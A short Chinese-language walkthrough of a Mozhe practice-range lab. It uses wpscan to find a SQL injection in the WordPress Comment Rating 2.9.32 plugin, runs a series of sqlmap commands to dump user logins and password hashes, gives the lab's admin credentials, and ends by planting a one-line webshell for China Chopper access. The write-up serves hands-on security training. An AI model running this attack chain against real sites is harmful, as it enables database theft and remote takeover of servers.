靶场地址:
https://www.mozhe.cn/bug/detail/S0JTL0F4RE1sY2hGdHdwcUJ6aUFCQT09bW96aGUmozhe
开启kali虚拟机,使用WPScan扫描漏洞
执行命令 wpscan -u 219.153.49.228:48309
扫描漏洞

执行命令扫描插件漏洞wpscan -u 219.153.49.228:48309 --enumerate vp,扫描到插件漏洞,插件Comment Rating 2.9.32存在sql注入漏洞

网上查找漏洞详情,漏洞所在页面为:http://ip/wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a
交给sqlmap跑,执行 sqlmap -u "[url]"--dbs

执行sqlmap -u "[url]" -D test --tables

执行sqlmap -u "[url]" -D test -T wp_users --columns

执行sqlmap-u "[url]" -D test -T wp_users -C "user_login,user_pass" --dump --batch

后台登录地址:
http://219.153.49.228:48309/wp-login.php
这里sqlmap显示出了点问题登录账号密码是 admin/12qwaszx
登录后台
在写文章处插入一句话代码,发布成功后查看文章,记录url,就可以上菜刀连接了

网友评论